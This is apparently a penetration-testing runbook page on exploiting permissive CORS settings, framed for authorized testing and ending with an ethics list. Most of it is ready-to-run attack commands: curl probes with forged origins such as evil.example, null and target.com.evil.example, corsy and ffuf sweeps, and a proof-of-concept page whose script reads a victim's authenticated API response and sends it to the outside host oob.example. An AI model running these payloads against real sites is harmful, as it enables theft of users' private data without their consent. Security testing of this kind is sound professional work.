Webupdated Oct 1, 2026
CORS Misconfigurations & Bypass
Exploiting permissive CORS: reflected and null origins, wildcard with credentials, subdomain trust, and reading authenticated responses.
toolbox:burp suitecurl
A CORS testing runbook for authorized pentests / bug bounty on in-scope targets only. Goal: find an endpoint that reflects an attacker origin (or trusts null) while allowing credentials, then prove an attacker page can read authenticated data.
1. Baseline the CORS headers
# Send an Origin and inspect the reflected headers
curl -s -D - -o /dev/null -H "Origin: https://evil.example" "https://target.com/api/me"
# Same request, no Origin, as a control
curl -s -D - -o /dev/null "https://target.com/api/me"
Capture Access-Control-Allow-Origin (ACAO) and Access-Control-Allow-Credentials (ACAC).
2. Test arbitrary origin reflection
# Reflected origin + credentials is the dangerous combination
curl -s -D - -o /dev/null -H "Origin: https://evil.example" "https://target.com/api/me" \
| grep -i "access-control-allow"
# Confirm the body differs when authenticated vs not
curl -s -H "Origin: https://evil.example" -b "session=YOURTOKEN" "https://target.com/api/me"
3. Probe null origin
null is sent by sandboxed iframes and data: URLs, so trusting it is exploitable.
curl -s -D - -o /dev/null -H "Origin: null" "https://target.com/api/me" \
| grep -i "access-control-allow"
# Exploit shape: <iframe sandbox srcdoc="<script fetch with credentials>"></iframe>
4. Subdomain and prefix trust
Apps often trust *.target.com but check with a naive endsWith, letting target.com.evil.example or a compromised subdomain through.
# Prefix/suffix confusion
curl -s -D - -o /dev/null -H "Origin: https://target.com.evil.example" "https://target.com/api/me" \
| grep -i "access-control-allow"
# Takeover-driven trust (if a subdomain is dangling)
curl -s -D - -o /dev/null -H "Origin: https://gone.target.com" "https://target.com/api/me" \
| grep -i "access-control-allow"
5. Enumerate with corsy
corsy -u https://target.com/api/me -t 20
corsy -i urls.txt -t 20 -o cors.txt
6. Enumerate endpoints worth testing
# Find API endpoints with auth-relevant paths
ffuf -u "https://target.com/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
-mc 200,401,403 -t 30 -o endpoints.txt
7. Build the proof-of-concept page
# Host this and confirm the browser returns victim data to your listener
cat > cors_poc.html <<'EOF'
<script>
fetch('https://target.com/api/me', {credentials:'include'})
.then(r => r.text())
.then(d => fetch('https://oob.example/cb?d=' + encodeURIComponent(d)));
</script>
EOF
python3 -m http.server 8000
Full pipeline
# 1. Baseline vs attacker origin
curl -s -D - -o /dev/null "https://target.com/api/me"
curl -s -D - -o /dev/null -H "Origin: https://evil.example" "https://target.com/api/me" | grep -i "access-control-allow"
# 2. Dangerous combinations
curl -s -D - -o /dev/null -H "Origin: null" "https://target.com/api/me" | grep -i "access-control-allow"
curl -s -D - -o /dev/null -H "Origin: https://target.com.evil.example" "https://target.com/api/me" | grep -i "access-control-allow"
# 3. Automated sweep
ffuf -u "https://target.com/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,401,403 -t 30 -o endpoints.txt
corsy -i endpoints.txt -t 20 -o cors.txt
# 4. Proof page
python3 -m http.server 8000
Ethics & legality
- Only test endpoints within the authorized scope, using accounts you own.
- Use a neutral PoC page that reads data once; do not harvest or store real user data.
- Confirm reflection with low request volume to avoid tripping WAFs.
- Save the exact Origin header, response headers, and body as evidence.